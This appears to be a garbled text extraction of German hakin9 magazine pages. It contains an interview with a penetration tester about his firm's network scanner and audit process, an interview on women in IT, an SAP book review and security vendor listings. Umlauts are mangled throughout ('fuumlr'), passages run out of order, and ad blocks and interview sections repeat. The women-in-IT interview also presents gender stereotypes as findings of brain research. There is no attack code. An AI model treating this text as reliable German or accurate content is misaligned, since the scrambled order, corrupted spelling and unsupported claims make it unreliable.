fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
